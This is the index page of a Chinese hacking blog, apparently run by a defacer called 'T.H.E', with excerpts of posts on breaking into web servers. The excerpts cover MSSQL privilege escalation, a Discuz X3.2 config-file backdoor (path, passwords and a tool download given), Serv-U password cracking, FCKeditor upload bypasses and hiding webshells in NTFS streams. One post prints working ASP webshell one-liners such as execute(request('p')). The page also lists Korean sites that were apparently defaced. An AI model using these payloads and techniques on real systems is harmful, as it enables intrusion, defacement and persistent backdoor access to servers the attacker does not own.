WEBSHELL

今天是

关于我联系我网站地图

现在位置:首页 » 2014年09月 发布的文章

mssql提权之修复xp_cmdshell

我想大家一定碰到过  SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 ...
作者:T.H.E   分类:入侵笔记   浏览(3018)   评论(0)   关键词: 提权教程阅读全文

今天我浏览了一下国外被黑站点统计

如图 这个是全世界黑客天堂  我就奇了怪 我明明没有在这个网站提交过 怎么会有我 http://zone-h.org/archive/notifier=T.H.E 我大概看了看 2014/05/06 就有人帮我在这提交 这些我都提交在 http://www.hack-cn.com/search.php?var=T...
作者:T.H.E   分类:生活资讯   浏览(4889)   评论(10)   关键词: 纯属扯淡阅读全文

9月

29日

韩国 思密达热门

韩国 思密达

http://aramtrading.co.kr/t.html http://bcganho.co.kr/t.html http://designbuild.co.kr/t.html http://elecap.co.kr/t.html http://feeg-korea.com/t.html http://ggcrazing.com/t.html http://92kim.com/t.html http://aircon...
作者:T.H.E   分类:生活资讯   浏览(2196)   评论(2)   关键词: 纯属扯淡阅读全文

Discuz! X3.2 配置文件一句话漏洞

我就不演示这么拿的 直接共享工具 关键字 自己整理 直接 拿起菜刀 连接 密码有这几个 c sos so  自己去一个一个试试 漏洞地址 :/utility/convert/data/config.inc.php 下载链接: http://yunpan.cn/cAWqY398zMRGX (提取码:654d)
作者:T.H.E   分类:最新工具   浏览(33798)   评论(14)   关键词: cms漏洞阅读全文

最近没时间出教程

我打算有时间 就来做课程试的教程 主要是现在没什么时间                                          谢谢大家支持!     &n...
作者:T.H.E   分类:生活资讯   浏览(2093)   评论(4)   关键词: 纯属扯淡阅读全文

科普一下serv-u密码破解方法哈

昨天我出了一个教程  https://www.webshell.ren/post-39.html 其中serv-u密码破解我有必要说一下 这个是昨天破解不了的 今天看看了可以破解了 所以说 cmd5真强大 注意我是 添加  nqFCE64E0056362E8FCAF813094EC39BC2 我...
作者:T.H.E   分类:最新教程   浏览(5206)   评论(0)   关键词: 渗透教程阅读全文

超级详细的一次提权流程

今天刚刚回到家 刚刚提到的服务器 于是乎就做一做文章给大家看看(没有什么技术含量 只是告诉大家一个思路) 系统的cmd是不能用了 自己找可写可执行权限的目录 (具体工具上传wt.asp 或者asp大马自带的目录权限检测工具) 这里我已经找到了可以执行cmd的目录 但是执行命令权限貌似很小  就连 ipconfig 都执行不了 ...
作者:T.H.E   分类:入侵笔记   浏览(9025)   评论(27)   关键词: 提权教程阅读全文

9月

03日

分享几个一句话热门

分享几个一句话

数据库加密一句话(密码a):┼攠數畣整爠煥敵瑳∨≡┩愾 数据库加密一句话(密码n):┼攠數畣整爠煥敵瑳∨≒┩眾┼砧┧眾    密码是n 网站配置、版权信息专用一句话:       "%><%execute(request("p"))%><%' "%><%Eval(Request(chr(112))...
作者:T.H.E   分类:最新工具   浏览(3786)   评论(2)   关键词: 一句话脚本阅读全文

9月

01日

特殊拿shell方法热门

特殊拿shell方法

新方式拿shell方法 很多人知道也有很多人不知道科普知识,以下地址已做处理,话说在拿一个站SHELL提权,首先用WWWSCAN扫描敏感信息如后台,数据库,网站备份等 信息不多还好扫到了个上传页面!看看能不能利用 打开https://www.webshell.ren/upload_flash.asp出现一个上传页面,先测试一下是否可以上传图片 连图片都不能上传,...
作者:T.H.E   分类:最新教程   浏览(6225)   评论(4)   关键词: 渗透教程阅读全文

接单之隐藏一句话木马

一般 我们拿到的shell很容易被发现 或者被删除现在教你们 如何隐藏 这是利用NTFS流隐藏你的一句话小马,这方法,文件写入后,不容易给发现,隐藏性好!   如下是ASP脚本的例子! NTFS流文件的内容如下 (NTFS流文件 是什么自己百度科普 还有这个只适用于win系统服务器) <% re= request("test") if re &l...
作者:T.H.E   分类:入侵笔记   浏览(5294)   评论(4)   关键词: 渗透教程阅读全文

9月

01日

Nginx最新高危0day热门

Nginx最新高危0day

Nginx最新0day测试利用   这个0day 应该有人测试成功了吧。   这个漏洞是7月20日发的,老外做了非常详细的分析,大家可以深入参考: https://nealpoole.com/blog/2011/07/possible-arbitrary-code-execution-with-null-bytes-php-and-old-versions-o...
作者:T.H.E   分类:最新教程   浏览(3226)   评论(4)   关键词: 系统漏洞阅读全文

提权HZHost虚拟主机

虚拟主机被提权的漏洞很多出在对目录权限设置上面,这一台也不例外。首先拿到了webshell(这个过程就不说了) 服务器虽然支持asp,aspx和php,但是权限被设置的都很死,我把cmd.exe传到C盘根目录,也仍然无法执行cmd命令。这可能意味着溢出提权是不可能了 提权分很多种,例如溢出提权有pr提权,ms11-046提权,iis7提权等等,这些都是溢出提权,在users或者其他低权限下运行一个...
作者:T.H.E   分类:入侵笔记   浏览(2710)   评论(2)   关键词: 提权教程阅读全文

最新方法突破fckeditor拿shell

经测试,此方法通杀asp、aspx版本,不适用于php。 之前很多的方法,诸如上传*.asp等类型文件;创建*.asp等目录&hellip;&hellip; 今天遇到一个fck编辑器,跟之前很多次一样,以上方法均无果。1 创建*.asp;*.php等目录无果;上传*.asp;.jpg等文件无果;神马cer之类的就不说了。 ...
作者:T.H.E   分类:最新教程   浏览(4803)   评论(3)   关键词: 渗透教程阅读全文
  • 全球访问统计

      Free counters!
  • <-----------------------------------------------分界线----------------------------------------------->